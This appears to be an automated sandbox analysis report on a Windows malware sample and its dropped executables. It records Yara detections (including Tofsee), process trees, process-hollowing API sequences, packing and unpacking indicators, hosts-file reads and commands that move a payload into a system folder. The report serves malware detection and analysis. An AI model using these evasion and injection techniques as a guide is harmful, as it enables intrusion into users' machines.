Source: Yara match	File source: 27.0.B483.exe.47e0e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000000.414147261.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.520963245.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.411422894.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.412569574.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B483.exe PID: 492, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Tofsee

Show sources

Source: Yara match	File source: 00000027.00000002.479473335.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.438774963.0000000002E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.471628621.0000000000400000.00000040.00020000.sdmp, type: MEMORY

System Summary:

PE file contains section with special chars

Show sources

Source: D711.exe.5.dr	Static PE information: section name:
Source: D711.exe.5.dr	Static PE information: section name: \|

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 492 -ip 492

Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 3_2_00402648	3_2_00402648
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 22_2_00402648	22_2_00402648
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_0042B4DB	27_2_0042B4DB
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_00434042	27_2_00434042
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_00442030	27_2_00442030
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_0045C0B6	27_2_0045C0B6
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_0041D11E	27_2_0041D11E
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_0042D1C3	27_2_0042D1C3
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_004201BE	27_2_004201BE
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_004352ED	27_2_004352ED
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_0044C338	27_2_0044C338
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_0043D383	27_2_0043D383
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_00436478	27_2_00436478
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00442489	31_2_00442489
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00465C58	31_2_00465C58
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_0047E2EC	31_2_0047E2EC
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_0042E315	31_2_0042E315
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_004543E9	31_2_004543E9
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00478400	31_2_00478400
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00468540	31_2_00468540
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_0045A50A	31_2_0045A50A
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_004165C4	31_2_004165C4
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00438589	31_2_00438589
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_004266AB	31_2_004266AB
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00478895	31_2_00478895
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00452C4A	31_2_00452C4A
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00478C33	31_2_00478C33

Source: 69CDTt1pad.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 69CDTt1pad.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 69CDTt1pad.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 69CDTt1pad.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AC25.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: B483.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: B483.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: B483.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: B483.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D711.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tvvihsf.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tvvihsf.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tvvihsf.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tvvihsf.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: 69CDTt1pad.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: String function: 00468171 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: String function: 00404694 appears 125 times
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: String function: 00401016 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: String function: 0042A1DD appears 56 times
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: String function: 0046E280 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: String function: 00466830 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: String function: 004125F4 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: String function: 0043F5D8 appears 53 times

Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 3_2_0040197F Sleep,NtTerminateProcess,	3_2_0040197F
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 3_2_0040198A Sleep,NtTerminateProcess,	3_2_0040198A
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 3_2_0040199C Sleep,NtTerminateProcess,	3_2_0040199C
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 3_2_004019A0 Sleep,NtTerminateProcess,	3_2_004019A0
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 3_2_004019B1 Sleep,NtTerminateProcess,	3_2_004019B1
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 21_2_02E30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,	21_2_02E30110
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 22_2_0040197F Sleep,NtTerminateProcess,	22_2_0040197F
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 22_2_0040198A Sleep,NtTerminateProcess,	22_2_0040198A
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 22_2_0040199C Sleep,NtTerminateProcess,	22_2_0040199C
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 22_2_004019A0 Sleep,NtTerminateProcess,	22_2_004019A0
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 22_2_004019B1 Sleep,NtTerminateProcess,	22_2_004019B1

Source: C:\Users\user\AppData\Local\Temp\B483.exe

Code function: 27_2_0043E45D: DeviceIoControl,GetLastError,

27_2_0043E45D

Source: .dll.28.dr

Static PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: .dll.28.dr

Static PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 69CDTt1pad.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: B483.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C481.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tvvihsf.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: D711.exe.5.dr	Static PE information: Section: ZLIB complexity 0.995475672468
Source: D711.exe.5.dr	Static PE information: Section: \| ZLIB complexity 0.999923406863

Source: 69CDTt1pad.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\AC25.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\tvvihsf

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@52/24@314/9

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C481.exe.5.dr, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
Source: C481.exe.5.dr, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: C481.exe.5.dr, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
Source: 28.0.C481.exe.c50000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
Source: 28.0.C481.exe.c50000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 28.0.C481.exe.c50000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
Source: 28.2.C481.exe.c50000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
Source: 28.2.C481.exe.c50000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 28.2.C481.exe.c50000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)

Source: AC25.exe

Binary or memory string: \RRTexture.vbp

Source: 69CDTt1pad.exe	Virustotal: Detection: 41%
Source: 69CDTt1pad.exe	ReversingLabs: Detection: 43%

Source: C:\Users\user\Desktop\69CDTt1pad.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\69CDTt1pad.exe 'C:\Users\user\Desktop\69CDTt1pad.exe'
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Process created: C:\Users\user\Desktop\69CDTt1pad.exe 'C:\Users\user\Desktop\69CDTt1pad.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tvvihsf C:\Users\user\AppData\Roaming\tvvihsf
Source: C:\Users\user\AppData\Roaming\tvvihsf	Process created: C:\Users\user\AppData\Roaming\tvvihsf C:\Users\user\AppData\Roaming\tvvihsf
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\AC25.exe C:\Users\user~1\AppData\Local\Temp\AC25.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B483.exe C:\Users\user~1\AppData\Local\Temp\B483.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C481.exe C:\Users\user~1\AppData\Local\Temp\C481.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 492 -ip 492
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CA2F.exe C:\Users\user~1\AppData\Local\Temp\CA2F.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D711.exe C:\Users\user~1\AppData\Local\Temp\D711.exe
Source: C:\Users\user\AppData\Local\Temp\D711.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 492 -s 752
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E4FD.exe C:\Users\user~1\AppData\Local\Temp\E4FD.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\E4FD.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F45F.exe C:\Users\user~1\AppData\Local\Temp\F45F.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\F45F.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\dsjnelnu\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\F45F.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user~1\AppData\Local\Temp\revewjlf.exe' C:\Windows\SysWOW64\dsjnelnu\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Process created: C:\Users\user\Desktop\69CDTt1pad.exe 'C:\Users\user\Desktop\69CDTt1pad.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\AC25.exe C:\Users\user~1\AppData\Local\Temp\AC25.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B483.exe C:\Users\user~1\AppData\Local\Temp\B483.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C481.exe C:\Users\user~1\AppData\Local\Temp\C481.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CA2F.exe C:\Users\user~1\AppData\Local\Temp\CA2F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D711.exe C:\Users\user~1\AppData\Local\Temp\D711.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Process created: C:\Users\user\AppData\Roaming\tvvihsf C:\Users\user\AppData\Roaming\tvvihsf	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 492 -ip 492	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 492 -s 752	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user~1\AppData\Local\Temp\AC25.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\B483.exe

Code function: 27_2_0042935B CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

27_2_0042935B

Source: CA2F.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: CA2F.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: CA2F.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: CA2F.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: CA2F.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: CA2F.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Users\user\AppData\Local\Temp\C481.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_0040F881 _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,FindCloseChangeNotification,

31_2_0040F881

Source: C:\Users\user\AppData\Local\Temp\B483.exe	Mutant created: \Sessions\1\BaseNamedObjects\user987uh4b36teeorinthj
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5872:64:WilError_01

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Users\user\AppData\Local\Temp\B483.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 69CDTt1pad.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\jenilol\fovogoranupiho_bakawol.pdb source: B483.exe, 0000001B.00000000.394575952.0000000000458000.00000002.00020000.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.295408110.000000000FBF0000.00000002.00000001.sdmp
Source:	Binary string: :C:\vala\fotedesoga23\boconadapujeb.pdb source: 69CDTt1pad.exe, 00000001.00000000.238098271.0000000000412000.00000002.00020000.sdmp, 69CDTt1pad.exe, 00000003.00000000.242571758.0000000000412000.00000002.00020000.sdmp, tvvihsf, 00000015.00000002.369968768.0000000000412000.00000002.00020000.sdmp
Source:	Binary string: C:\vala\fotedesoga23\boconadapujeb.pdb source: 69CDTt1pad.exe, 00000001.00000000.238098271.0000000000412000.00000002.00020000.sdmp, 69CDTt1pad.exe, 00000003.00000000.242571758.0000000000412000.00000002.00020000.sdmp, tvvihsf, 00000015.00000002.369968768.0000000000412000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\Alexx\Desktop\QWER\DeviceCredentialDeployment\bin\Release\Secured\ConfigurationStringConstants.pdb source: C481.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.295408110.000000000FBF0000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\69CDTt1pad.exe	Unpacked PE file: 3.2.69CDTt1pad.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\tvvihsf	Unpacked PE file: 22.2.tvvihsf.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Unpacked PE file: 31.2.CA2F.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;

Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 1_2_02F9B114 push ss; retf	1_2_02F9B115
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 3_2_0040205F push ebx; iretd	3_2_00402060
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 3_2_00402BE4 pushfd ; retf	3_2_00402BE5
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 3_1_0040205F push ebx; iretd	3_1_00402060
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 3_1_00402E1C push ss; retf	3_1_00402E1D
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Code function: 3_1_00402BE4 pushfd ; retf	3_1_00402BE5
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 21_2_02E327FF push ebx; iretd	21_2_02E32800
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 21_2_02E335BC push ss; retf	21_2_02E335BD
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 21_2_02E33384 pushfd ; retf	21_2_02E33385
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 21_2_02FEAABC push ss; retf	21_2_02FEAABD
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 22_2_0040205F push ebx; iretd	22_2_00402060
Source: C:\Users\user\AppData\Roaming\tvvihsf	Code function: 22_2_00402BE4 pushfd ; retf	22_2_00402BE5
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_004000BB push edx; retf	27_2_004000C2
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00468249 push ecx; ret	31_2_0046825C
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_0046E2C5 push ecx; ret	31_2_0046E2D8

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_00412190 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,

31_2_00412190

Source: C481.exe.5.dr

Static PE information: 0xF3E8DBF0 [Thu Sep 3 13:09:04 2099 UTC]

Source: D711.exe.5.dr	Static PE information: section name:
Source: D711.exe.5.dr	Static PE information: section name: \|
Source: D711.exe.5.dr	Static PE information: section name: .themida
Source: D711.exe.5.dr	Static PE information: section name: .boot

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: D711.exe.5.dr	Static PE information: real checksum: 0x31df22 should be: 0x31981b
Source: C481.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x91ec6

Source: initial sample	Static PE information: section name: .text entropy: 7.56509790612
Source: initial sample	Static PE information: section name: .text entropy: 7.97186691386
Source: initial sample	Static PE information: section name: .text entropy: 7.74005815224
Source: initial sample	Static PE information: section name: \| entropy: 7.99829629323
Source: initial sample	Static PE information: section name: .text entropy: 7.56509790612

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\tvvihsf

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\C481.exe	File created: C:\Users\user\AppData\Local\Temp\876504d2-be03-42d9-b2f9-6ed891d3a9d2\ .dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\CA2F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B483.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C481.exe	Jump to dropped file
